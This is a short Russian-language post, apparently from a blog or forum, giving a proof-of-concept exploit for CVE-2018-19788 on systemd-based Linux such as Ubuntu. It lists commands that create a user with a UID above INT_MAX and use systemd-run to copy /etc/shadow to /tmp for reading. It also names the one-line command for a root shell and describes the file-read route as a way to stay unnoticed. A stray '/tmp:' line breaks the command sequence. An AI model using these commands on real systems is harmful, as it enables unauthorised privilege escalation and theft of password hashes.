
Эксплуатация CVE-2018-19788 без root-shell
CVE-2018-19788 — это проблема, при которой любой пользователь с UID больше INT_MAX (т.е. 4000000000) может выполнять любые команды systemctl на системе с systemd, например Ubuntu. (Уже есть описание получения root-оболочки: здесь). Основное отличие этого описания от полного получения root-оболочки заключается в том, что здесь команды выполняются от самого пользователя, а не от root (по сути, просто PoC).
Чтобы получить root-оболочку, достаточно выполнить systemd-run -t /bin/bash, но если вы хотите оставаться незамеченным, можно выполнить простые команды для получения привилегированных файлов без терминала. Выполните следующие шаги:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp:
cat /tmp/results_poc.txt